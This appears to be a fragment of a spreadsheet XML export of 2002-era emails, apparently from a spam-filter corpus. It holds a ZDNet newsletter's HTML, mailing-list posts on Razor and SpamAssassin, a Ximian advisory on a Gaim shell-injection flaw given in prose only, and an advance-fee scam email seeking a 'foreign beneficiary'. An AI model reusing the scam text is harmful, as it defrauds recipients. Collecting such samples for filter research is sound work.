                 &lt;font face="ms sans serif" size="-2"&gt;
                 &lt;b&gt;Stage 2: Variable Price-Feature Ratio&lt;/b&gt;&lt;br /&gt;Expect high variability in prices among products with similar features. It pays to comparison shop for the best price.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0"&gt;
                 &lt;tr&gt;&lt;td&gt;
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,519801,00.html"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_review.gif" alt="Read review" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-11600-1411-5609413.html?tag=st.cr.mp.dp.pr5609413"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_prices.gif" alt="Check prices" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;!-- /3 --&gt;
         &lt;/td&gt;
         &lt;td width="10"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="10" /&gt;&lt;/td&gt;
         &lt;td width="1" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;
         &lt;td width="9"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="9" /&gt;&lt;/td&gt;
         &lt;td width="280"&gt;
                 &lt;!-- 4 --&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/title_4.gif" alt="Sony PlayStation 2" width="280" height="35" border="0" /&gt;&lt;br /&gt;
                 &lt;div align="center"&gt;
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,133000,00.html"&gt;&lt;img src="http://shopper.cnet.com/i/sh/zd/02/img_ps2.jpg" alt="Sony PlayStation 2" width="280" height="180" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;
                 &lt;font face="ms sans serif" size="-2"&gt;
                 &lt;div align="center" style="padding-top:8px; padding-bottom:8px"&gt;&lt;img src="http://www.cnet.com/b.gif" width="8" height="5" border="0" alt="" /&gt;&lt;/div&gt;
                 &lt;b&gt;The Lowdown:&lt;/b&gt; The elder statesman of next-generation consoles, the PS2, now priced below $200, has the luxury of a year's head start and many solid games.
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,133000,00.html" style="text-decoration:none"&gt;Read Review&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td colspan="5" height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Check Latest Prices&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.7458626_0.7932420-2&amp;destUrl=http%3A%2F%2Fwww%2Ejandr%2Ecom%2FJRProductPage%2Eprocess%3FRestartFlow%3Dt%26Merchant%5FId%3D1%26Product%5FCode%3DPS2%2BPLAYSTATI%252f2%26source%3Dzdnet%2Edatafeed%2Etext%2E20020612" style="text-decoration:none"&gt;J&amp;amp;R Music and Computer&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.7458626_0.7932420-2&amp;destUrl=http%3A%2F%2Fwww%2Ejandr%2Ecom%2FJRProductPage%2Eprocess%3FRestartFlow%3Dt%26Merchant%5FId%3D1%26Product%5FCode%3DPS2%2BPLAYSTATI%252f2%26source%3Dzdnet%2Edatafeed%2Etext%2E20020612" style="text-decoration:none"&gt;$199&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="5" rowspan="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/products/i/arrow_yl.gif" width="8" height="10" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235336_1.7932420-2&amp;destUrl=http%3A%2F%2Fclickserve%2Ecc%2Ddt%2Ecom%2Flink%2Fddiprod%3Flid%3D345209%26pid%3D269748" style="text-decoration:none"&gt;PC Connection&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/go/to?tag=ex.cr.dp_0.235336_1.7932420-2&amp;destUrl=http%3A%2F%2Fclickserve%2Ecc%2Ddt%2Ecom%2Flink%2Fddiprod%3Flid%3D345209%26pid%3D269748" style="text-decoration:none"&gt;$199&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="8"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="8" height="13" border="0" alt="" /&gt;&lt;/td&gt;
                 &lt;td width="200"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 				&lt;/td&gt;
                 &lt;td width="62" align="right"&gt;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;	
 				&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#ffffff"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;td colspan="3"&gt;
                         &lt;table border="0" cellpadding="0" cellspacing="0"&gt;
                         &lt;tr&gt;&lt;td&gt;&lt;img alt="" src="http://www.zdnet.com/products/i/dollar.gif" width="13" height="13" align="absmiddle" /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;font face="ms sans serif" size="-2"&gt;&lt;b&gt;
 						&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-11600-1411-7932420.html?tag=st.cr.mp.dp.pr7932420" style="text-decoration:none"&gt;Check Prices&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td width="5"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="5" /&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5"&gt;&lt;img alt="" height="3" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="5" bgcolor="#cccccc"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0" bgcolor="#eeeeee"&gt;
                 &lt;tr&gt;&lt;td height="15" bgcolor="#999999"&gt;&lt;font face="ms sans serif" size="-2" color="#ffffff"&gt;&amp;nbsp;&lt;b&gt;Price-Feature Ratio Analysis&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/graph_ps2.gif" alt="Price-Feature Ratio Analysis" width="280" height="103" border="0" /&gt;&lt;br /&gt;
                 &lt;img alt="" src="i/dots280.gif" width="280" height="1" vspace="10" /&gt;&lt;br /&gt;
                 &lt;font face="ms sans serif" size="-2"&gt;
                 &lt;b&gt;Stage 3: Low Price-Feature Ratio&lt;/b&gt;&lt;br /&gt;When compared to products with similar features, prices are low and don't vary much from merchant to merchant. Use our merchant ratings to find the right one for you.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;/font&gt;
                 &lt;table cellpadding="0" cellspacing="0" width="280" border="0"&gt;
                 &lt;tr&gt;&lt;td&gt;
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,133000,00.html"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_review.gif" alt="Read review" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;
 				&lt;a href="http://zdnetshopper.cnet.com/shopping/resellers/0-11600-1411-7932420.html?tag=st.cr.mp.dp.pr7932420"&gt;&lt;img src="http://www.zdnet.com/products/photogallery/button_prices.gif" alt="Check prices" width="135" height="19" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;&lt;br /&gt;&lt;br /&gt;
                 &lt;!-- /4 --&gt;
         &lt;/td&gt;
         &lt;/tr&gt;
         &lt;/table&gt;
 &lt;/td&gt;
 &lt;td width="10"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="10" /&gt;&lt;/td&gt;
 &lt;td bgcolor="#000000" width="1"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;
 &lt;td bgcolor="#1e5c99" width="10"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="10" /&gt;&lt;/td&gt;
 &lt;td bgcolor="#83a3cb" width="1"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;
 &lt;!-- main --&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=624&gt;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width="624"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href='http://clickthru.online.com/Click?q=f7-N00nr8gumSXlr_I2jcNa6sT0eqKwtdRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.zdnet.com/filters/email/faq/"&gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/a&gt;&lt;br&gt;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width=624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width=624 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://www.zdnet.com/"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://www.zdnet.com/techupdate/filters/main/" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020441,00.html" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020424,00.html" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020442,00.html" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020443,00.html" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020445,00.html" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020444,00.html" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020568,00.html" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=624 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;tr:ad name="copyright" /&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=0d-3a5unDrTqG-SqjV756XJrJ8XisRR"&gt;
 --2063203.1026378321083.JavaMail.root.abv-sfo1-ac-agent1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: David Friedman: Mail Me the Money!
</t>
  </si>
  <si>
    <t xml:space="preserve">The case against theft also acknowledges that the value to the thief is
 often far less than the value to the victim.  Stealing my $1,000 sterio
 and then fencing it for $50 does not result in 'no loss' the the economy
 overall.  For the same reason that voluntary transactions increase
 social value, involuntary ones decrease it.  If the sterio was worth as
 much to the theif as it was to me he'd buy it ...
 On the flip side of this, common law allows a breach of property law in
 precisely the type of scenarios where a net social gain is recorded but
 the owner's availability to make a contract was problematic.  Breaking
 into your isolated cabin because I'm starving, for example, is
 permissible if I later offer restitution for the damage I caused and the
 food I ate.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Russell Turpin
 &gt; Sent: Saturday, August 10, 2002 6:25 AM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: David Friedman: Mail Me the Money!
 &gt; 
 &gt; R. A. Hettinga:
 &gt; &gt;..which reminds me of my favorite David Friedman quote. "The direct
 use
 &gt; of
 &gt; &gt;physical force is so poor a solution to the problem of limited
 resources
 &gt; &gt;that it is commonly employed only by small children and great
 nations."
 &gt; 
 &gt; Is that relevent here? The spam problem, like
 &gt; the fraud and the robbery problem, is about people
 &gt; who will do whatever it takes to make a buck, no
 &gt; matter how much harm they do to others in the
 &gt; process.
 &gt; 
 &gt; From an economist's viewpoint, the downside of
 &gt; theft is not that it transfers property from one
 &gt; person to another, which is no loss to the economy
 &gt; overall, but that defending against it is an
 &gt; additional expense simply to enjoy what you
 &gt; have already acquired.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 13 Aug 2002, Theo Van Dinter wrote:
 &gt; On Tue, Aug 13, 2002 at 11:58:03AM -0500, Justin Shore wrote:
 &gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments 
 &gt; &gt; from my spam mailbox before I run the mailbox through razor-report, 
 &gt; &gt; correct?  Does anyone know of an easy way to do this?
 &gt; 
 &gt; use "spamassassin -r".  It'll take a message, strip the SA bits, and
 &gt; report to razor, all in one shot. :)
 As long as you're not using razor2, that is, right?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</si>
  <si>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The problem is clearly because the info isn't syncing between the
 servers.  If I run the check against honor which is where it was
 reported then the check is positive.  If I run the check against apt or
 fire, it's negative.
 -----Original Message-----
 From: Rose, Bobby 
 Sent: Wednesday, August 07, 2002 9:05 AM
 To: mail@vipul.net
 Cc: ML-razor-users
 Subject: RE: [Razor-users] What's wrong with the Razor servers now?
 It's still doing it.  I reported a message as spam 10 minutes ago and
 the check keeps coming back false.  What's funny is that message that
 I'm testing with it the sample-spam.txt message from SpamAssassin and I
 know it's been reported before.
 -----Original Message-----
 From: Vipul Ved Prakash [mailto:mail@vipul.net] 
 Sent: Wednesday, August 07, 2002 3:45 AM
 To: Rose, Bobby
 Cc: ML-razor-users
 Subject: Re: [Razor-users] What's wrong with the Razor servers now?
 Hi,
 We were rolling out changes to TeS and catalogue servers over the last
 two days. Any glitches you might have experienced would have been due to
 the upgrades. The upgrades are now complete, and things are back to
 normal. Several new features in TeS will provide better accuracy,
 specially with regards to false-positives.
 cheers,
 vipul.
 On Tue, Aug 06, 2002 at 06:54:04PM -0400, Rose, Bobby wrote:
 &gt; I'm still seeing this.  It reports to honor.cloudmark.com but checks
 &gt; against apt.cloudmark.com.  What is the sync delay between these 
 &gt; boxes?
 &gt; 
 &gt; -----Original Message-----
 &gt; From: Rose, Bobby
 &gt; Sent: Monday, August 05, 2002 2:05 PM
 &gt; To: ML-razor-users
 &gt; Subject: [Razor-users] What's wrong with the Razor servers now?
 &gt; 
 &gt; 
 &gt; I noticed a low count of razor'd spam messages. So after digging, if I
 &gt; razor-report a message the diags say that it was accepted but if I
 &gt; turn around and run a check on the exact same message that was 
 &gt; reported, then it doesn't find the sig and as such isn't spam.
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net 
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Beneficiary needed.
</t>
  </si>
  <si>
    <t xml:space="preserve">--0-1561587743-1028562700=:5319
 Content-Type: text/plain; charset=us-ascii
 Hi, I am Fatimata i have been thinking to get a trust worthy person about the issure boadering me but i never wanted to say this to any body but i can no longer keep this to my self.please i will like you to advice on this,i want a beneficiary to my deposited fund in the I.C.C international credit commission liaison vault office hear in dakar senegal.which i was ask to get a foriegn beneficiary who this fund can be transfer to his account before it can be relaese .so this has been  urgent that is why i am puting this before you for an idea or if you are willing to do this for me ,and your service percentage will be discuss as soon as you agree to do this. Thanks. 
 ---------------------------------
 Post your ad for free now! Yahoo! Canada Personals
 --0-1561587743-1028562700=:5319
 Content-Type: text/html; charset=us-ascii
 &lt;BR&gt;
 &lt;P&gt;Hi,&amp;nbsp;I am Fatimata i have been thinking&amp;nbsp;to get a trust worthy person about the issure boadering me but i never wanted to say this to any body but i can no longer keep this to my self.please i will like you to advice on this,i want a beneficiary to my deposited fund in the I.C.C international credit commission liaison vault office hear in dakar senegal.which i was ask to get a foriegn beneficiary who this fund can be transfer to his account before it can be relaese .so this has been&amp;nbsp; urgent that is why i am puting this before you for an idea or if you are willing to do this for me ,and your service percentage will be discuss as soon as you agree to do this. Thanks. 
 &lt;P&gt;&lt;/P&gt;&lt;p&gt;&lt;br&gt;&lt;hr size=1&gt;Post your ad for free now! &lt;a href="http://ca.personals.yahoo.com/"&gt;&lt;b&gt;Yahoo! Canada Personals&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 --0-1561587743-1028562700=:5319--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Skinny Acoustic Bass
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85539452
 Date: Not supplied
 [IMG: http://www.konaweb.com/stick/left.jpg] I often carry my ukulele with me 
 on planes. The case is so little it can fit in my suit case. I missed a great 
 photo opportunity when I was in the airport a couple of weeks ago, and saw 
 someone checking on a standup bass fiddle. It was in a huge plastic Darth Vader 
 shipping case. The _buckles_ on the thing were about the size of my uke. I 
 should have taken a picture of my uke and the bass side-by-side. Anyway, here's 
 a stand-up bass that looks much more portable: the Kona Walkingstick. You still 
 need to carry around an amp, though. Link[1] Discuss[2] _(Thanks, Prentiss[3]!)
 _
 [1] http://www.konaweb.com/stick/index.shtml
 [2] http://www.quicktopic.com/17/H/EDukecyrhdW
 [3] http://boingboing.net/&amp;#65279;http://www.io.com/~riddle/
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Eugen,
 EL&gt; I believe I mentioned users can't be bothered to enter passphrases. That's
 EL&gt; what tokens are there for. At some point we can expect a convenient USB
 EL&gt; port on the keyboard,
 You mean like on mac keyboards :-)    Or laptops (which are as damn
 near close to keyboard/usb connection as one can get, without the real
 thing)
 Sorry, couldn't help myself.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: Latest Iraq-related news
</t>
  </si>
  <si>
    <t xml:space="preserve">Even better:
 http://www.ridiculopathy.com/news_detail.php?id=668
 White House: President's "War Boner" Must Be Satisfied
 ..."The President can't seem to hide his excitement about a possible
 military conflict with Iraq. At a recent function honoring America's
 war widows, Bush sported a visible erection when his speech turned to
 the subject of the Middle East.
 'Believe me when I say this. With or without the help of other
 nations, with or without UN approval, we will penetrate Iraq's
 borders. With overwhelming force, we will pound Iraq over and over
 again without ceasing. And, once its leaders concede defeat, we will
 seed Iraq with American-style democracy.'
 Aides say the podium was scrubbed down thoroughly after the event with
 a special cleanser/biocide not used since the Clinton
 administration.".....
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Ximian Updates] Hyperlink handling in Gaim allows arbitrary code to be executed
</t>
  </si>
  <si>
    <t xml:space="preserve">Severity: Security
 Product: gaim
 Keywords: gaim hyperlink manual
 References: 
   CAN-2002-0989 
     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0989
   Gaim Changelog
     http://gaim.sourceforge.net/ChangeLog
 Gaim is an instant messaging client based on the published TOC
 protocol from AOL. The developers of Gaim, an instant messenger client
 that combines several different networks, found a vulnerability in the
 hyperlink handling code. The 'Manual' browser command passes an
 untrusted string to the shell without escaping or reliable quoting,
 permitting an attacker to execute arbitrary commands on the users
 machine. Unfortunately, Gaim doesn't display the hyperlink before the
 user clicks on it. Users who use other inbuilt browser commands aren't
 vulnerable.
 The fixed version of Gaim no longer passes the user's manual browser
 command to the shell. Commands which contain the %s in quotes will
 need to be amended, so they don't contain any quotes. The 'Manual'
 browser command can be edited in the 'General' pane of the
 'Preferences' dialog, which can be accessed by clicking 'Options' from
 the login window, or 'Tools' and then 'Preferences' from the menu bar
 in the buddy list window.
 Please download Gaim 0.59.1 or later using Red Carpet. You may also
 obtain this update from the Ximian FTP site.
 Debian Potato
 ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim_0.59.1-1.ximian.2_i386.deb
 ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-common_0.59.1-1.ximian.2_i386.deb
 ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-gnome_0.59.1-1.ximian.2_i386.deb
 Mandrake 8.0
 ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-80-i586/gaim-0.59.1-1.ximian.2.i586.rpm
 Mandrake 8.1
 ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-81-i586/gaim-0.59.1-1.ximian.2.i586.rpm
 Mandrake 8.2
 ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-82-i586/gaim-0.59.1-1.ximian.2.i586.rpm
 Redhat 6.2
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 Redhat 7.0
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 Redhat 7.1
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 Redhat 7.2
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 Redhat 7.3
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 Solaris 7/8
 ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/gaim-0.59.1-2.ximian.1.sparc.rpm
 SuSE 7.1
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 SuSE 7.2
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 SuSE 7.3
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 SuSE 8.0
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-0.59.1-1.ximian.2.i386.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-applet-0.59.1-1.ximian.2.i386.rpm
 Yellowdog 2.0
 ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-0.59.1-1.ximian.2.ppc.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-applet-0.59.1-1.ximian.2.ppc.rpm
 Yellowdog 2.1
 ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-0.59.1-1.ximian.2.ppc.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-applet-0.59.1-1.ximian.2.ppc.rpm
 Yellowdog 2.2
 ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-0.59.1-1.ximian.2.ppc.rpm
 ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-applet-0.59.1-1.ximian.2.ppc.rpm
 _______________________________________________
 updates maillist  -  updates@ximian.com
 To unsubscribe from this list, or to change your subscription options, follow the link below:
 http://lists.ximian.com/mailman/listinfo/updates
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Men et Toil
